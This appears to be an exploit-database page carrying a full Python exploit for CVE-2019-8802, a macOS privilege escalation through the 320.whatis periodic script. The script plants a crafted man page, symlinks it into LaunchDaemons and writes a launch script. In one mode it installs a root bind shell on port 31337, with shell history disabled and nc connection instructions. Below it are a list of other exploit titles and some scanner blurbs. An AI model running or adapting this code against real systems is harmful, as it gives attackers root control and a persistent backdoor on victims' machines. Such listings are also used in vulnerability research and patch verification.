Search for hundreds of thousands of exploits

"MacOS 320.whatis Script - Privilege Escalation"

Author

Exploit author

"Csaba Fitzl"

Platform

Exploit platform

macos

Release date

Exploit published date

2020-05-12

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
# Exploit Title: MacOS 320.whatis Script - Privilege Escalation
# Date: 2020-05-06
# Exploit Author: Csaba Fitzl
# Vendor Homepage: https://support.apple.com/en-us/HT210722
# Version: macOS < 10.15.1
# Tested on: macOS
# CVE : CVE-2019-8802

import sys
import os

man_file_content = """
.TH exploit 1 "August 16 2019" "Csaba Fitzl"
.SH NAME
exploit \- --> <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict><key>Label</key><string>com.sample.Load</string><key>ProgramArguments</key><array> <string>/Applications/Scripts/sample.sh</string></array><key>RunAtLoad</key><true/></dict></plist><!--
"""

sh_quick_content = """
/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
"""

sh_reboot_content = """
python /Applications/Scripts/bind.py
"""

python_bind_content = """
#!/usr/bin/python2
import os
import pty
import socket

lport = 31337

def main():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(('', lport))
    s.listen(1)
    (rem, addr) = s.accept()
    os.dup2(rem.fileno(),0)
    os.dup2(rem.fileno(),1)
    os.dup2(rem.fileno(),2)
    os.putenv("HISTFILE",'/dev/null')
    pty.spawn("/bin/bash")
    s.close()
	
if __name__ == "__main__":
    main()
"""

def create_man_file():
	print("[i] Creating bogus man page: /usr/local/share/man/man1/<!--exploit.1")	
	f = open('/usr/local/share/man/man1/<!--exploit.1','w')
	f.write(man_file_content)
	f.close()

def create_symlink():
	print("[i] Creating symlink in /usr/local/share/man/")
	os.system('ln -s /Library/LaunchDaemons/com.sample.Load.plist /usr/local/share/man/whatis.tmp')	

def create_scripts_dir():
	print("[i] Creating /Applications/Scripts directory")
	os.system('mkdir /Applications/Scripts')

def create_quick_scripts():
	create_scripts_dir()
	print("[i] Creating script file to be called by LaunchDaemon")
	f = open('/Applications/Scripts/sample.sh','w')
	f.write(sh_quick_content)
	f.close()
	os.system('chmod +x /Applications/Scripts/sample.sh')

def create_reboot_scripts():
	create_scripts_dir()
	print("[i] Creating script file to be called by LaunchDaemon")
	f = open('/Applications/Scripts/sample.sh','w')
	f.write(sh_reboot_content)
	f.close()
	os.system('chmod +x /Applications/Scripts/sample.sh')
	print("[i] Creating python script for bind shell")
	f = open('/Applications/Scripts/bind.py','w')
	f.write(python_bind_content)
	f.close()

def rename_man_pages():
	for root, dirs, files in os.walk("/usr/local/share/man"):
		for file in files:
			if file[0] in "0123456789": #if filename begins with a number
				old_file = os.path.join(root, file)
				new_file = os.path.join(root, 'a' + file)
				os.rename(old_file, new_file) #rename with adding a prefix
				print("[i] Renaming: " + os.path.join(root, file))

def main():
	if len(sys.argv) != 2 :
		print "[-] Usage: python makewhatis_exploit.py [quick|reboot]"
		sys.exit (1)
	if sys.argv[1] == 'quick':
		create_man_file()
		create_symlink()
		create_quick_scripts()
		rename_man_pages()
		print "[+] Everything is set, run periodic tasks with:\nsudo periodic weekly\n[i] and then simulate a boot load with: \nsudo launchctl load com.sample.Load.plist"
	elif sys.argv[1] == 'reboot':
		create_man_file()
		create_symlink()
		create_reboot_scripts()
		rename_man_pages()
		print "[+] Everything is set, run periodic tasks with:\nsudo periodic weekly\n[i] reboot macOS or run `sudo launchctl load com.sample.Load.plist` and connect to your root shell via:\nnc 127.1 31337"
	else:
		print "[-] Invalid arguments"
		print "[-] Usage: python makewhatis_exploit.py [quick|reboot]"

if __name__== "__main__":
	main()
Release DateTitleTypePlatformAuthor
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-29"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass"webappsmultiple"Halis Duraki"
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
Release DateTitleTypePlatformAuthor
2020-05-12"MacOS 320.whatis Script - Privilege Escalation"localmacos"Csaba Fitzl"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48464/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.